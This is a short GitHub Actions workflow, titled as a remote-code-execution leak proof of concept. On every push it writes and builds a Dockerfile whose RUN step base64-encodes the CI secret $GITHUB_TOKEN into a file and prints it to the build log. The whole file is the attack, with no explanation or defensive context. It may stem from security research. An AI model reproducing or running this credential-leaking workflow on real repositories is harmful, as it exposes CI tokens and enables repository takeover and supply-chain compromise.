name: RCE Leak PoC

on: [push]

jobs:
  rce:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Inject Dockerfile
        run: |
          echo -e "FROM alpine\nRUN echo \$GITHUB_TOKEN | base64 > /leaked && cat /leaked" > Dockerfile
          docker build -t poc .
